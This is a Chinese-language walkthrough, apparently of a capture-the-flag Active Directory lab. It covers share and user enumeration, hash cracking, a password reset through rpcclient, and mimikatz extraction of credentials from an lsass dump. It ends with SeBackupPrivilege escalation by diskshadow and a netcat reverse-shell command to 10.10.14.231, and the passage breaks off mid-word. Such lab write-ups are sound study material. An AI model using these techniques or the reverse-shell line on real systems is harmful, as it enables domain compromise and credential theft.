53  open  domain?    88  open  kerberos-sec    135  open  msrpc  主要信息来源  389  open  ldap    445  open  microsoft-ds?  主要信息来源  593  open ncacn_http     3268  open  ldap   通过smbclient 检查，有共享 这个域里一共有314个用户，实际上这台服务器的用户远没有那么多。 通过制作一个用户名列表 当前获取到了support 用户的hash 解密后，密码就是白色区域那部分 然后用rpcclient链接以这个用户，枚举系统用户名。 这里有个漏洞，试过了所有的系统用户，只有这个可以重置这个用户的密码。 audit2020 然后这个时候有了 forensic文件夹的访问权限了，1个多G。 然后基本全分析一边，用 windbg 和 volatility 花了很多时间。转折点在这里。 当我搜索了一堆关键字，我看到这个美女的头像。注意到了  mimikatz 这个工具。 开始我还以为是专门搜索DMP文件的密码的。后来实在搞不定，看了下别人的做法。 瞬间注意到了lsass这个进程。是我输入的进程文件不对！！！！！！ 然后一路顺风，获取到第三个用户。svc_bakcup。 顺利用evil登录 提权：      由于在前期寻找立足点中，花了5天时间，论坛上看了大量别人的提示，所以，提权部分基本没怎么耗时间。 【文件可以在这里下载： 点击我 】 import-module ./SeBackupPrivilegeCmdLets.dll import-module ./SeBackupPrivilegeUtils.dll script2.txt set context persistent nowriters add volume c: alias someAlias create expose %someAlias% j: exec c:\temp\backup.cmd delete shadows volume %someAlias% reset backup.cmd c:\temp\nc.exe 10.10.14.231 9999 -e cmd.exe 其实backup.cmd并没有用。 di